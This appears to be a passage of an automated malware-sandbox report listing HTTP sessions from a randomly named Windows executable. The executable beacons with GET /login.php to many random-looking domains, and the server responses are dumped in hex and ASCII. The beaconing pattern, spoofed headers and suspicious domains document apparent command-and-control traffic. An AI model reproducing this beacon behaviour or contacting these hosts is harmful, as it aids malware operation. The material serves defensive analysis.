                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480606079 CET1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                                  Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480619907 CET1236INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                                  Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481296062 CET1236INData Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72
                                                                                                                                                                                                                  Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481307983 CET584INData Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e
                                                                                                                                                                                                                  Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481792927 CET1236INData Raw: 65 72 79 2f 22 2b 6d 2b 22 2f 63 6d 70 22 2b 62 2b 70 2b 22 2e 6a 73 22 3b 6a 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 2d 61 62 22 2c 22 31 22
                                                                                                                                                                                                                  Data Ascii: ery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481803894 CET1236INData Raw: 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b 65 3d 62 2e 6c 65 6e 67 74 68 7d 62 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 65 2c 62 2e 6c 65 6e 67 74 68 29 7d 72 65 74 75 72 6e 28 66 29 7d 3b 77 69 6e 64 6f 77 2e 63
                                                                                                                                                                                                                  Data Ascii: b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmp
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.482537031 CET1236INData Raw: 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 67 69 73 74 65 72 65 64 22 2c 6c 69 73 74 65 6e 65 72 49 64 3a 63 2c 64 61 74 61 3a 74 72 75 65 2c 70 69 6e 67 44 61 74 61 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65
                                                                                                                                                                                                                  Data Ascii: e:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.482549906 CET1236INData Raw: 20 62 3d 63 2e 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 74 63 66 61 70 69 28 62 2e 63 6f 6d 6d 61 6e 64 2c 62 2e 76 65 72 73 69 6f 6e 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 74 63 66 61 70
                                                                                                                                                                                                                  Data Ascii: b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" i
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.483212948 CET716INData Raw: 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 74 63 66 61 70 69 4c 6f 63 61 74 6f 72 22 29 7d 69 66
                                                                                                                                                                                                                  Data Ascii: tcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.485519886 CET1236INData Raw: 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22
                                                                                                                                                                                                                  Data Ascii: on handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://galyqaz.com/sk-logabpstatus.php?a=SkpPSHVUbmZKc0VMdDA0MTA5Yk8zZXhLVlpiT3JPbjdsUXJVNzVzV25


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  94192.168.2.65919544.221.84.105803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.316389084 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347473|1731347428|9|4|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.732925892 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:19 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  95192.168.2.65919844.221.84.105803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.316392899 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347473|1731347428|13|3|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.731360912 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:19 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  96192.168.2.659197199.59.243.227803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.318542957 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.730324984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:18 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: a864822b-6a6f-48ea-938d-f29b46c30e35
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:19 GMT
                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.730525970 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDc5LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  97192.168.2.659200188.114.96.3803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852452993 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.371321917 CET793INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5ANPRQ0oEhY01hWUgIfPwOSkVNxW2eFU0NyLkjvQm9weZ3VhMBeiWrxMYW7bqLBNnjslWrVsxtMqrbCYtYUbdNqi7u%2FfsgvtYSoZPL4uZ%2BksvyCqyvVcJoIRrLv1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e102141d8bdac5d-YYZ
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=12209&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.374891043 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  98192.168.2.659207154.212.231.82803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.873689890 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.755846024 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  99192.168.2.659205208.100.26.245803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.875442028 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.315754890 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  100192.168.2.659204178.162.203.226803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.876887083 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  101192.168.2.65920699.83.170.3803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.876890898 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.296226978 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  102192.168.2.65920818.208.156.248803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.876971006 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.304280043 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
